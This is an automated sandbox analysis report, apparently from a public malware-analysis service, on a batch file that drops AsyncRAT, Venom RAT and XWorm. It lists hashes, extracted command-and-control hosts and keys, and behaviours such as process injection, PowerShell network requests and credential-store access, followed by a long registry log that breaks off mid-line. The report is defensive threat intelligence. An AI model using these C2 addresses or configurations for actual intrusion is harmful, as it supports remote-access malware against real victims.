Analysis
-
max time kernel
514s -
max time network
553s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
22-11-2024 11:08
Static task
static1
Behavioral task
behavioral1
Sample
new.bat
Resource
win10ltsc2021-20241023-en
Errors
General
-
Target
new.bat
-
Size
3KB
-
MD5
bd47e14051c394e917f8eb7db0d37fd9
-
SHA1
ea77a21b48e513515944fdc06f4b89fad8fd7193
-
SHA256
8fd4747164c2b456115b9bfa01b06d6cc94ffe8de0b73065915d43e43bd7521e
-
SHA512
715bc05d6d75fc400e6998959bcf2517e854782783175c559e0d720a85b420c0e2cae4097ec50e1257d84e5fbda494ed33c5e6f7f451ace877bdf52e19d7a54e
Malware Config
Extracted
asyncrat
Default
sdanarchynd.duckdns.org:7878
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
Default
soasyncb.duckdns.org:6745
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
5.0.5
Venom Clients
jkvernm.duckdns.org:8520
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
xworm
3.1
hnxwrm3.duckdns.org:8292
7OmhyCIQgrHx3yxU
-
install_file
USB.exe
Extracted
xworm
5.0
newxrm5.duckdns.org:9390
momentnb3901.duckdns.org:3901
0IpUtNjbaz65ubYv
-
install_file
USB.exe
Signatures
-
Asyncrat family
-
Detect Xworm Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/4896-11355-0x00000225CB6D0000-0x00000225CB6DE000-memory.dmp family_xworm behavioral1/memory/1280-11359-0x00000298E7800000-0x00000298E7810000-memory.dmp family_xworm behavioral1/memory/1156-11362-0x000001A1C66E0000-0x000001A1C66F0000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
python.exepython.exepython.exepython.exepython.exepython.exepython.exedescription pid process target process PID 3800 created 3580 3800 python.exe Explorer.EXE PID 2568 created 3580 2568 python.exe Explorer.EXE PID 3424 created 3580 3424 python.exe Explorer.EXE PID 3284 created 3580 3284 python.exe Explorer.EXE PID 4092 created 3580 4092 python.exe Explorer.EXE PID 2940 created 3580 2940 python.exe Explorer.EXE PID 3176 created 3580 3176 python.exe Explorer.EXE -
Xworm family
-
Async RAT payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1616-11336-0x0000028B420F0000-0x0000028B42106000-memory.dmp family_asyncrat behavioral1/memory/2220-11342-0x00000209E09A0000-0x00000209E09B2000-memory.dmp family_asyncrat behavioral1/memory/2200-11345-0x000002CFA6130000-0x000002CFA6146000-memory.dmp family_asyncrat -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 8 320 powershell.exe 58 3652 powershell.exe 68 3028 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 320 powershell.exe 3652 powershell.exe 3028 powershell.exe 3724 powershell.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Deletes itself 1 IoCs
Processes:
notepad.exepid process 1156 notepad.exe -
Executes dropped EXE 7 IoCs
Processes:
python.exepython.exepython.exepython.exepython.exepython.exepython.exepid process 3800 python.exe 2568 python.exe 3424 python.exe 3284 python.exe 4092 python.exe 2940 python.exe 3176 python.exe -
Loads dropped DLL 42 IoCs
Processes:
python.exepython.exepython.exepython.exepython.exepython.exepython.exepid process 3800 python.exe 3800 python.exe 3800 python.exe 3800 python.exe 3800 python.exe 3800 python.exe 2568 python.exe 2568 python.exe 2568 python.exe 2568 python.exe 2568 python.exe 2568 python.exe 3424 python.exe 3424 python.exe 3424 python.exe 3424 python.exe 3424 python.exe 3424 python.exe 3284 python.exe 3284 python.exe 3284 python.exe 3284 python.exe 3284 python.exe 3284 python.exe 4092 python.exe 4092 python.exe 4092 python.exe 4092 python.exe 4092 python.exe 4092 python.exe 2940 python.exe 2940 python.exe 2940 python.exe 2940 python.exe 2940 python.exe 2940 python.exe 3176 python.exe 3176 python.exe 3176 python.exe 3176 python.exe 3176 python.exe 3176 python.exe -
Drops file in System32 directory 1 IoCs
Processes:
notepad.exedescription ioc process File opened for modification C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5\ notepad.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 4048 tasklist.exe 5068 tasklist.exe -
Drops file in Program Files directory 1 IoCs
Processes:
notepad.exedescription ioc process File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\javapath\ notepad.exe -
Processes:
SearchApp.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe -
Modifies registry class 64 IoCs
Processes:
SearchApp.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\AudioInput\\TokenEnums\\MMAudioIn\\" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\de-DE-N\\tn1031.bin" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{6BFCACDC-A6A6-4343-9CF6-83A83727367B}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; telephone=NativeSupported; computer=NativeSupported; address=NativeSupported; currency=NativeSupported; message=NativeSupported; url=NativeSupported; alphanumeric=NativeSupported" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech SW Voice Activation - Italian (Italy)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\it-IT\\VoiceActivation_it-IT.dat" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 1 0008 2 0009 aa 000a ae 000b ah 000c ao 000d aw 000e ax 000f ay 0010 b 0011 ch 0012 d 0013 dh 0014 eh 0015 er 0016 ey 0017 f 0018 g 0019 h 001a ih 001b iy 001c jh 001d k 001e l 001f m 0020 n 0021 ng 0022 ow 0023 oy 0024 p 0025 r 0026 s 0027 sh 0028 t 0029 th 002a uh 002b uw 002c v 002d w 002e y 002f z 0030 zh 0031" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HW" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft David - English (United States)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\fr-FR\\M1036Hortense" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\it-IT\\MSTTSLocitIT.dat" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\ = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "0" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Ayumi - Japanese (Japan)" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR de-DE Locale Handler" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "L3082" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState\EdpState = "0" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "- 0001 ! 0002 & 0003 , 0004 . 0005 ? 0006 _ 0007 + 0008 * 0009 1 000A 2 000B 3 000C 4 000D 5 000E a 000F ai 0010 an 0011 ang 0012 ao 0013 ba 0014 bai 0015 ban 0016 bang 0017 bao 0018 bei 0019 ben 001A beng 001B bi 001C bian 001D biao 001E bie 001F bin 0020 bing 0021 bo 0022 bu 0023 ca 0024 cai 0025 can 0026 cang 0027 cao 0028 ce 0029 cen 002A ceng 002B cha 002C chai 002D chan 002E chang 002F chao 0030 che 0031 chen 0032 cheng 0033 chi 0034 chong 0035 chou 0036 chu 0037 chuai 0038 chuan 0039 chuang 003A chui 003B chun 003C chuo 003D ci 003E cong 003F cou 0040 cu 0041 cuan 0042 cui 0043 cun 0044 cuo 0045 da 0046 dai 0047 dan 0048 dang 0049 dao 004A de 004B dei 004C den 004D deng 004E di 004F dia 0050 dian 0051 diao 0052 die 0053 ding 0054 diu 0055 dong 0056 dou 0057 du 0058 duan 0059 dui 005A dun 005B duo 005C e 005D ei 005E en 005F er 0060 fa 0061 fan 0062 fang 0063 fei 0064 fen 0065 feng 0066 fo 0067 fou 0068 fu 0069 ga 006A gai 006B gan 006C gang 006D gao 006E ge 006F gei 0070 gen 0071 geng 0072 gong 0073 gou 0074 gu 0075 gua 0076 guai 0077 guan 0078 guang 0079 gui 007A gun 007B guo 007C ha 007D hai 007E han 007F hang 0080 hao 0081 he 0082 hei 0083 hen 0084 heng 0085 hong 0086 hou 0087 hu 0088 hua 0089 huai 008A huan 008B huang 008C hui 008D hun 008E huo 008F ji 0090 jia 0091 jian 0092 jiang 0093 jiao 0094 jie 0095 jin 0096 jing 0097 jiong 0098 jiu 0099 ju 009A juan 009B jue 009C jun 009D ka 009E kai 009F kan 00A0 kang 00A1 kao 00A2 ke 00A3 kei 00A4 ken 00A5 keng 00A6 kong 00A7 kou 00A8 ku 00A9 kua 00AA kuai 00AB kuan 00AC kuang 00AD kui 00AE kun 00AF kuo 00B0 la 00B1 lai 00B2 lan 00B3 lang 00B4 lao 00B5 le 00B6 lei 00B7 leng 00B8 li 00B9 lia 00BA lian 00BB liang 00BC liao 00BD lie 00BE lin 00BF ling 00C0 liu 00C1 lo 00C2 long 00C3 lou 00C4 lu 00C5 luan 00C6 lue 00C7 lun 00C8 luo 00C9 lv 00CA ma 00CB mai 00CC man 00CD mang 00CE mao 00CF me 00D0 mei 00D1 men 00D2 meng 00D3 mi 00D4 mian 00D5 miao 00D6 mie 00D7 min 00D8 ming 00D9 miu 00DA mo 00DB mou 00DC mu 00DD na 00DE nai 00DF nan 00E0 nang 00E1 nao 00E2 ne 00E3 nei 00E4 nen 00E5 neng 00E6 ni 00E7 nian 00E8 niang 00E9 niao 00EA nie 00EB nin 00EC ning 00ED niu 00EE nong 00EF nou 00F0 nu 00F1 nuan 00F2 nue 00F3 nuo 00F4 nv 00F5 o 00F6 ou 00F7 pa 00F8 pai 00F9 pan 00FA pang 00FB pao 00FC pei 00FD pen 00FE peng 00FF pi 0100 pian 0101 piao 0102 pie 0103 pin 0104 ping 0105 po 0106 pou 0107 pu 0108 qi 0109 qia 010A qian 010B qiang 010C qiao 010D qie 010E qin 010F qing 0110 qiong 0111 qiu 0112 qu 0113 quan 0114 que 0115 qun 0116 ran 0117 rang 0118 rao 0119 re 011A ren 011B reng 011C ri 011D rong 011E rou 011F ru 0120 ruan 0121 rui 0122 run 0123 ruo 0124 sa 0125 sai 0126 san 0127 sang 0128 sao 0129 se 012A sen 012B seng 012C sha 012D shai 012E shan 012F shang 0130 shao 0131 she 0132 shei 0133 shen 0134 sheng 0135 shi 0136 shou 0137 shu 0138 shua 0139 shuai 013A shuan 013B shuang 013C shui 013D shun 013E shuo 013F si 0140 song 0141 sou 0142 su 0143 suan 0144 sui 0145 sun 0146 suo 0147 ta 0148 tai 0149 tan 014A tang 014B tao 014C te 014D tei 014E teng 014F ti 0150 tian 0151 tiao 0152 tie 0153 ting 0154 tong 0155 tou 0156 tu 0157 tuan 0158 tui 0159 tun 015A tuo 015B wa 015C wai 015D wan 015E wang 015F wei 0160 wen 0161 weng 0162 wo 0163 wu 0164 xi 0165 xia 0166 xian 0167 xiang 0168 xiao 0169 xie 016A xin 016B xing 016C xiong 016D xiu 016E xu 016F xuan 0170 xue 0171 xun 0172 ya 0173 yan 0174 yang 0175 yao 0176 ye 0177 yi 0178 yin 0179 ying 017A yo 017B yong 017C you 017D yu 017E yuan 017F yue 0180 yun 0181 za 0182 zai 0183 zan 0184 zang 0185 zao 0186 ze 0187 zei 0188 zen 0189 zeng 018A zha 018B zhai 018C zhan 018D zhang 018E zhao 018F zhe 0190 zhei 0191 zhen 0192 zheng 0193 zhi 0194 zhong 0195 zhou 0196 zhu 0197 zhua 0198 zhuai 0199 zhuan 019A zhuang 019B zhui 019C zhun 019D zhuo 019E zi 019F zong 01A0 zou 01A1 zu 01A2 zuan 01A3 zui 01A4 zun 01A5 zuo 01A6" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "{2984A9DB-5689-43AD-877D-14999A15DD46}" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\en-US\\MSTTSLocenUS.dat" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\es-ES\\M3082Pablo" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\lsr1040.lxa" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "0" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "spell=NativeSupported; cardinal=GlobalSupported; ordinal=NativeSupported; date=GlobalSupported; time=GlobalSupported; message=NativeSupported; address=NativeSupported; media=NativeSupported; telephone=NativeSupported; currency=NativeSupported; url=NativeSupported; alphanumeric=NativeSupported" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\it-IT-N\\AI041040" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheVersion = "1" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\de-DE-N\\L1031" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\c3082.fe" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\L3082" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\es-ES\\VoiceActivation_es-ES.dat" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Paul" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\ja-JP\\M1041Haruka" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Near" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hedda - German (Germany)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR it-IT Lookup Lexicon" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "English Phone Converter" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Speech HW Voice Activation - German (Germany)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\es-ES\\VoiceActivation_HW_es-ES.dat" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "Microsoft Hortense - French (France)" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "SR it-IT Locale Handler" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\System32\\Speech_OneCore\\VoiceActivation\\it-IT\\VoiceActivation_HW_it-IT.dat" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search\ = "0" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\TTS\\de-DE\\M1031Hedda" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "%windir%\\Speech_OneCore\\Engines\\SR\\es-ES-N\\AI043082" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "既定の音声として%1を選びました" SearchApp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local 